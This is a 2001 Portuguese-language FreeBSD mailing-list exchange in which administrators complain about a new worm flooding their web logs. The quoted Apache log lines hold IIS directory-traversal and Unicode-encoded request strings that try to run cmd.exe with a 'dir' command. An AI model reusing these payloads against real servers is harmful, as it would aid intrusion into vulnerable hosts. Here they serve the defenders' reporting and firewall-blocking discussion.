[FUGSPBR] Que ótimo.

:: Patrick Tracanelli :: eeviac em fatectq.com.br
Qua Set 19 01:55:03 BRT 2001


 Nossa e eu que (egoista) pensei que soh eu tava sendo vitima disso... comecou faz 2 dias aqui, um monte de IPs fazendo rekizicao em cmd.exe e root.exe... como se neo fosse um saco esses logs e ainda o desperdicio de banda q isso causa, ainda tem a ofensa pessoal de achar q meu freebsd eh um mero nt com IIS...

 P.S.: criei regras dinamicas pra por no firewall o povo q faz essas requisicoes, mas em 1 noite deu 23 IPs distintos :( isso impossibilita eu bloquear no roteador e ainda continua consumindo banda... alguem sabe que raio de maldica eh essa? qual o nome da cria? os poucos IPs q tinham reverso eram dominio .cl :/ haja paciencia ricardo hehehe


On Tue, 18 Sep 2001 20:42:50 -0300
Ricardo Ryoiti Sugawara Junior <ricardorsj em uol.com.br> wrote:

>    Olá.
>
>    Vejam que ótimo. Depois do codered enchendo nossos logs, me parece 
>que temos outro worm, que dessa vez pesquisa diversas vulnerabilidades 
>do IIS... Não estou preocupado com as falhas, mas acredito que todos 
>ficamos de saco cheio de ver esse tipo de coisa nos nossos logs .. :/
>
>
>200.193.137.242 - - [18/Sep/2001:20:38:01 -0300] "GET 
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 322 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:02 -0300] "GET 
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 322 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:02 -0300] "GET 
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir 
>HTTP/1.0" 404 338 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:03 -0300] "GET 
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:03 -0300] "GET 
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (-pct)
>200.193.137.242 - - [18/Sep/2001:20:38:04 -0300] "GET 
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:04 -0300] "GET 
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 (0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:05 -0300] "GET 
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 (-pct)
>200.193.137.242 - - [18/Sep/2001:20:38:05 -0300] "GET 
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 288 (-pct)
>200.193.137.242 - - [18/Sep/2001:20:38:06 -0300] "GET 
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 
>(0pct)
>200.193.137.242 - - [18/Sep/2001:20:38:06 -0300] "GET 
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305 (0pct)
>
>    []'s
>    Ricardo.
----
+---------------------------------------------------------------+---------+
|              Patrick Leandro Tracanelli do Carmo              | (   )   |
|             RPGw/IRC Nick -- Eksffa Shyranui Kapwam           | (O_O)   |
|        Eeviac host FreeBSD 5.0-CURRENT Dual SMP @444Mhz       | \`-'/  w|
| 4o Ciclo (Fatorial) - Faculdade de Tecnologia de Taquaritinga | (   )__||
|===============================================================| /m`m\   |
|       eksffa em fatectq.com.br  -  Fone: (0xx55) 9972-9465       | FreeBSD |
+---------------------------------------------------------------+---------+
|Administrador de Redes e Sistemas | BSD Unix, System V & Open Source Syst|
+---------------------------------------------------------------+---------+
Long live Hanin Elias, Kim Deal!!!
~
~
----
Para sair da lista envie um e-mail para majordomo em fugspbr.org
com as palavras "unsubscribe fugspbr" no corpo da mensagem.



Mais detalhes sobre a lista de discussão freebsd